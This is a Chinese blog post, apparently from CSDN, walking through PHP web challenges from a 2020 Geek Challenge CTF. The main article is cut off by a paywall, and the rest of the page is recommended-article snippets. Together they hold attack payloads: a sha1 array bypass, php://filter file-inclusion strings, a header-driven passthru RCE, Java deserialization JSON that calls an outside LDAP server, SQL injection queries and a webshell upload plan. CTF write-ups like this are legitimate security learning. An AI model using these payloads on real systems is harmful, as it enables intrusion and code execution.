[极客大挑战 2020]Roamphp 1、2、4

原创 已于 2022-04-05 13:27:57 修改 · 2.1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web安全

于 2022-04-05 13:19:55 首次发布
本文介绍了多个Web安全场景下的漏洞利用技巧,包括数组绕过加密、zip伪协议利用和无参RCE。通过示例代码展示了如何利用这些技巧执行任意代码,如通过文件包含漏洞读取敏感信息,以及通过请求头操纵执行shell命令。同时,文章还讲解了PHP的$_SESSION变量理解及正则表达式的使用。 
知识点:数组绕过加密,zip伪协议,无参rce

Roamphp1-Welcome

 <?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
   
   
header("HTTP/1.1 405 Method Not Allowed");
exit();
} else {
   
   
    
    if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){
   
   
        show_source(__FILE__);
    }
    else if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){
   
   
        phpinfo();  // collect information from phpinfo!
    }
}

sha1无法处理数组,会返回null,所以全等
在这里插入图片描述

Roamphp2-Myblog

观察每个页面,会发现都有个page参数,那么这个参数会不会有文件包含漏洞呢?
在这里插入图片描述

在这里插入图片描述
试试

php://filter/read=convert.base64-encode/resource=login

确实有。
在这里插入图片描述
login

<?php
require_once("secret.php");
mt_srand($secret_seed);
$_SESSION['password'] = mt_rand();
?>

secret.php

<?php
$secret_seed = mt_rand();
?>

看了半天也没发现有什么洞,再回到login页面。
登录的时候,会显示page=admin/user,admin/user虽然看着不像文件名,但它确实是。
在这里插入图片描述
在这里插入图片描述

两段代码:

第一段:username为Longlone,password为前两个mt_rand()产生的数,这边有个知识点要说一下如果我们删去了cookie中的PHPSESSID,那么传进去密码将不再是longlone的密码,没有cookie就找不到是哪个用户,那么服务端存的$_SESSION[‘password’])也就为空了,那我们只需要也传一个空密码按道理就可以绕过了。

简单点来说就是这边的password是随着cookie传进去的,如果cookie中为空,那么我们也传一个空密码,再后台判断中也就相同了。$_POST['password'] == $_SESSION['password']
在这里插入图片描述

<?php
最低0.47元/天 解锁文章
[极客挑战 2020]Roamphp2-Myblog - 伪协议+文件上传+(LFI&ZIP)||(LFI&Phar)【***】
oZuoShen123的博客
10-09 625
1、点击login,进入登录界面,用户名在首页提示了是longlone,密码未知,无法登录。 2、点击其他地方,发现没有什么线索,唯一有的只有page这个参数。 3、题目描述:Do you know the PHP pseudo-protocol? —— 意思就是跟伪协议有关系 关键代码:
buu-day10
anwen12的博客
01-27 2388
0x01 [红明谷CTF 2021]JavaWeb /;/json绕过权限校验,然后漏洞探测 ["java.net.InetAddress","khl16k.dnslog.cn"] ["br.com.anteros.dbcp.AnterosDBCPConfig", {"healthCheckRegistry": "ldap://8.142.93.103:9090/test"}] ["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation"
[极客挑战 2020]Roamphp4-Rceme
不会编程的崽的博客
06-20 955
右键源代码里给了提示,有备份文件index.php.swp,伙都做到这来了,应该不用写了吧。加这个[~%FF]只是因为php7的解析方式,当然换成其他的也可以例如[~%EF] [~%CF]passthru(next(getallheaders()));然后,需要要绕过两层,多年rce经验,相信你一眼能看出。我们由内往外构造,这里需要前置知识(贴其他佬的吧)知道原因可以在评论区踢我一脚。
NSSCTF-极客挑战2020-web-wp
F1rstb100d
09-21 1005
NSSCTF-极客挑战2020-web-wp
[极客挑战 2019]RCE ME buuctf 题目详解思路
weixin_73560599的博客
08-31 1310
非常经典的无字母数字RCE 且这套题目加了些过滤条件 不是特别难 只是有个disable_function 是需要注意的
[极客挑战 2020]Roamphp2-Myblog
m0_56059226的博客
08-17 1500
打开环境并没有什么发现 login那也不可以注册,works也没什么发现。 但是可以看到url栏中都传了一个page变量,猜想可能存在文件包含,先试试传一个/etc/passwd,什么都看不到,又想试一试php伪协议,看可不可以看到原码。 ?page=php://filter/read=convert.base64-encode/resource=login.php 也是啥都没有,诶,可以注意到他自己传的东西都没有加php后缀,可能他后端自己补充了,那改一下payload ?pa..
BUUCTF--[极客挑战 2020]Roamphp1-Welcome
qq_46263951的博客
07-29 461
进入页面后一片空白,查看源码也啥也没有,蒙蔽中... 看佬wp说有提示,直接改为post请求即可查看到一段代码 根据源码中的提示,如果我们想要获取更多的信息就要使下面的语句成立 if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){ 若想成立非常简单,因为sha1函数无法处理数组,所以令两个变量都为数组则得出的结果为false===false值为..
[极客挑战 2020]FighterFightsInvincibly
Biodog的博客
09-13 903
正好同学搭了这题的复现环境就做了一下,感觉还是挺好的题,buu的环境不知道是不是配置的有问题只有一个人解,当时就没去看 源码就一行$_REQUEST['fighter']($_REQUEST['fights'],$_REQUEST['invincibly']); 用create_function 构造fighter=create_function&fights=&invincibly=;}phpinfo();/* 可以读到phpinfo,直接连shell的话不行,应该是设置了权限,而且读ph
[极客挑战 2020]Greatphp
LYJ20010728的博客
05-31 2290
[极客挑战 2020]Greatphp考点思路Payload 考点 PHP原生类利用、PHP反序列化、md5()和sha1()对类进行hash触发__toString方法 思路 进入题目,分析源码,题目绕过类型第一眼看上去在ctf的基础题目中非常常见,一般情况下只需要使用数组即可绕过,但是由于这里是在类里面,我们不能这么做 所以我们可以使用含有 __toString 方法的PHP内置类来绕过,用的两个比较多的内置类就是 Exception 和 Error ,他们之中有一个 __toString 方
136,【3】 buuctf web [极客挑战 2020]Roamphp4-Rceme
2402_87039650的博客
02-15 641
三次都尝试之后,我才反应过来,我输的是文件的格式.........对 $code 进行 MD5 哈希运算,然后取结果的前 5 个字符。判断取出来的前 5 个字符是否等于 "4a94f"先去官网下载能打开这个文件的软件。恢复后的内容就会写入到这个文件中。下载好后在cmd输入命令。
极客挑战 2019 php,[极客挑战 2019]RCE ME
weixin_39986896的博客
03-27 276
[极客挑战 2019]RCE ME前面考察取反或者异或绕过, 后面读 Flag 那里我用脏方法过了, 没看出来考察啥进入题目给出源码:
极客挑战php,buucitf-[极客挑战 2020]Roamphp1-Welcome
weixin_36280317的博客
03-22 315
打开靶机,发现什么也没有,因为极客挑战有hint.txt,里面说尝试换一种请求的方式,bp抓包,然后发送了POST请求,出现了下面的界面这个还是挺简单的,因为是极客挑战上的第一波题,关键是这个如果不是用POST请求,就会出现类似报错的信息。紧接着就是isset这个很好绕过,我们要传参,这个肯定到了else if判断,如果进入这个循环,我们就可以拿到这个站的phpinfo()信息,POST传两个...
[极客挑战 2020]
qq_62046696的博客
09-18 730
可以看到,他设置了白名单,但我想传一句话木马上去,而且上传成功的话他会告诉你上传的路径,然后再用之前可以传的page参数可以解析伪协议的,但是并不确定是否可以php文件也会被解析,先不想那么多,做来看。坚定了我传木马的决心,这里想到了将php文件打包成zip,改后缀名为jpg,再利用zip伪协议进行读取。整体看下来,要执行check过滤函数,我们就需要执行,waf的else部分,然后过滤掉了php、eval可以用PHP短标签进行绕过,比如。请求方式有误,比如应该用GET请求方式的资源,用了POST。
[CISCN2020]-rceme
Keepb1ue的博客
08-24 4109
题目源码: <?php error_reporting(0); highlight_file(__FILE__); parserIfLabel($_GET['a']); function danger_key($s) { $s=htmlspecialchars($s); $key=array('php','preg','server','chr','decode','html','md5','post','get','request','file','cookie','session'
BUUCTF [极客挑战 2020] Roamphp1-Welcome
Senimo
12-21 1530
BUUCTF [极客挑战 2020] Roamphp1-Welcome 考点: POST传参方式 sha1()不能加密数组 启动题目: 等了一阵子,一直是这样,查阅其他wp得知,原题中提示有:换一种请求方式 使用BurpSuite抓去数据包: 将传参方式修改为POST,发送数据包,得到题目源码: error_reporting(0); if ($_SERVER['REQUEST_METHOD'] !== 'POST') { header("HTTP/1.1 405 Method Not Allow
Hashpump实现哈希长度扩展攻击 | [极客挑战]RCEME
crispr的博客
02-17 2279
Hashpump实现哈希长度扩展攻击 | RCEME 0x01 HASH长度拓展攻击 哈希长度拓展攻击的原理有点过于复杂了,这里直接copy其他佬的描述了。 长度扩展攻击(length extension attack),是指针对某些允许包含额外信息的加密散列函数的攻击手段。对于满足以下条件的散列函数,都可以作为攻击对象: ① 加密前将待加密的明文按一定规则填充到固定长度(例如512或1024...
[BUUCTF0223][极客挑战 2020]Roamphp1-Welcome
m0_52674595的博客
12-24 551
[BUUCTF0223] [极客挑战 2020]Roamphp1-Welcome 打开靶机 什么都没 查看源码 什么也没有 猜想不是用GET请求 尝试用POST请求 使用火狐的插件:RESTClient 使用POST请求 查看预览 看到要求 $_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'] 即roam1与roam2不能相等 再看sha1()函数 查看得知sha1()
[极客挑战 2019]RCE ME
qq_43801002的博客
08-03 1978
题目 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }
极客挑战 2019]easysql 2
最新发布
09-09
给定引用中未包含极客挑战2019 easysql 2的相关内容,不过可以依据一般SQL注入题目的解题思路来推测其可能的解题步骤。 通常对于SQL注入题目,首先要判断注入点和闭合方式。可以尝试输入一些特殊字符,如单引号 `'`、双引号 `"`、括号 `()` 等,观察页面的响应变化。若输入特殊字符后页面报错,可能存在注入点,并且能根据报错信息判断闭合方式。就像在某些题目中输入 `1'`,与原本的单引号形成 `1''`,数据库会将其处理成 `1'` 的字符串,从而影响SQL语句的正常闭合和执行 [^3]。 判断出闭合方式后,接着要判断数据库类型和版本。可以使用一些数据库特定的函数和语句,如 `version()` 获取数据库版本,`database()` 获取当前数据库名。 之后是爆库、爆表和爆列。爆库可以使用类似 `union select 1,2,group_concat(schema_name) from information_schema.schemata` 的语句;爆表则是在确定数据库名后,用 `union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='数据库名'`;爆列就是在确定表名后,用 `union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='表名'`,如同在 [极客挑战 2019]LoveSQL1 中爆 `l0ve1ysq1` 表的列一样 [^1]。 最后,获取所需数据,即根据前面爆出来的列名,使用 `union select 列1,列2,... from 表名` 来获取具体的数据,可能就是题目要求的 flag。 以下是一个简单的Python脚本示例,用于尝试注入: ```python import requests url = "http://example.com" # 替换为实际的题目URL payloads = ["1'", "1\"", "1')", "1\")"] for payload in payloads: data = { "username": payload, "password": "123" # 可根据实际情况修改 } response = requests.post(url, data=data) if "error" in response.text.lower(): print(f"可能的注入点和闭合方式:{payload}") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值